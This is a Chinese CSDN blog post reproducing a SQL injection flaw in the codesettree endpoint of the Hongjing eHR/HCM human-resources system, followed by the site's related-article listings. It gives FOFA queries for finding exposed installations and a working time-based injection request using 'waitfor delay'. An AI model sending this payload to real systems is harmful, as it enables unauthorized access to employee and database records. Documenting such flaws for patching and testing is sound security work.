宏景ehr-hcm-codesettree-sql注入

已于 2024-03-11 20:50:54 修改
阅读量73 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-11 20:50:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136634846
版权

产品简介

宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招召聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。

漏洞概述

该漏洞存在于宏景EHR人力资源管理系统的codesettree 接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库初被篡改或其他严重后果。

网络测绘

app="HJSOFT-HCM" || body="宏景" || body="hj-hy-all-one-logo" || body="/general/sys/hjaxmanage.js"

漏洞复现

GET /servlet/codesettree?flag=3&codesetid=111%27;waitfor+delay+%270:0:2%27--&
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
宏景eHR customreport/tree SQL注入漏洞复现
0xSec
04-12 500
宏景eHR customreport/tree 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
失心少年
06-20 1209
版权声明:本文为CSDN博主「OidBoy_G」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/qq_41904294/article/details/130944159。宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。宏景eHR < 8.2。
CNVD-2023-08743:宏景HCM SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
11-07 2012
宏景HCM系统 categories处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
【漏洞复现】宏景HCM-LoadOtherTreeServlet SQL注入
weixin_54799594的博客
07-11 1094
漏洞复现过程记录
【1day】复现宏景HCM codesettree SQL注入漏洞(CNVD-2023-08743)
记录并分享学习安全的知识点..
07-26 1239
北京宏景世纪软件股份有限公司 HCM codesettree 接口存在SQL注入漏洞,攻击者通过漏洞可以获取到登陆系统的账号密码和数据库信息。
【1day】复现宏景OA KhFieldTree接口 SQL注入漏洞
记录并分享学习安全的知识点..
10-17 444
宏景OA是一款基于云计算和SaaS模式的企业级办公自动化软件,它为企业提供了全面的办公自动化解决方案,包括协同办公、流程管理、文档管理、知识管理、人力资源管理、客户关系管理等多个模块。它可以帮助企业提高工作效率、降低成本、提高管理水平和企业形象。宏景OA KhFieldTree接口存在 SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。 ​
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
ehr-extraction
03-17
标题“ehr-extraction”可能指的是一个关于电子健康记录(Electronic Health Record, EHR)数据提取的项目或工具。在这个领域,开发人员通常会构建系统来从海量的医疗数据中抽取、整理和分析有价值的信息。结合标签...
宏景eHR数据字典
08-26
宏景eHR数据字典,
宏景eHR知识型企业管理策略.doc
11-29
宏景eHR知识型企业管理策略】 在当前的数字化时代,知识型企业的崛起对人力资源管理提出了新的挑战。宏景eHR系统就是针对这类企业的特点,提供了高效、灵活的解决方案,以适应知识型企业的矩阵组织结构、高流动性...
哈尔滨东安集团应用宏景eHR系统提升管理水平
03-03
东安集团一直以来都非常重视信息技术在企业的应用,三年来,通过深入应用宏景eHR人力资源管理信息系统,大大提高了集团人力资源管理效率,软件特有的易用性、灵活性以及开放性,深得我们人力资源部人员的喜爱,大家...
【1day】宏景OA get_org_tree.jsp接口SQL注入漏洞学习
记录并分享学习安全的知识点..
11-02 437
宏景OA是一款基于云计算和SaaS模式的企业级办公自动化软件,它为企业提供了全面的办公自动化解决方案,包括协同办公、流程管理、文档管理、知识管理、人力资源管理、客户关系管理等多个模块。它可以帮助企业提高工作效率、降低成本、提高管理水平和企业形象。宏景OA get_org_tree.jsp存在接口SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
宏景eHR fileDownLoad SQL注入漏洞复现
0xSec
01-10 757
宏景eHR fileDownLoad 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息
漏洞复现-宏景HJSOFT系列
aming小老弟
03-15 1271
宏景HCM--------------------------------------------fofa:app=“HJSOFT-HCM
【漏洞复现】宏景人力资源信息管理系统 showmediainfo SQL注入漏洞
https://blog.echo234.cn/
04-04 1109
宏景科技是一家在智慧城市综合服务领域具有显著影响力的企业。公司以数字赋能百业兴旺,以智慧定义城市未来,致力于让城市管理更简单,让市民工作、生活更便捷。作为行业的佼佼者,宏景科技不断跟进物联网、大数据、云计算、GIS、人工智能等新技术的最新发展及应用,积极掌握并实现核心技术的更新迭代,积累了一定的技术储备。
【漏洞复现】CNVD-2023-08743
zkaqlaoniao的博客
11-01 247
title=”人力资源信息管理系统”
【网络安全】本地文件包含及远程文件包含漏洞详解
最新发布
goldfish8848的博客
08-05 517
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 709
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值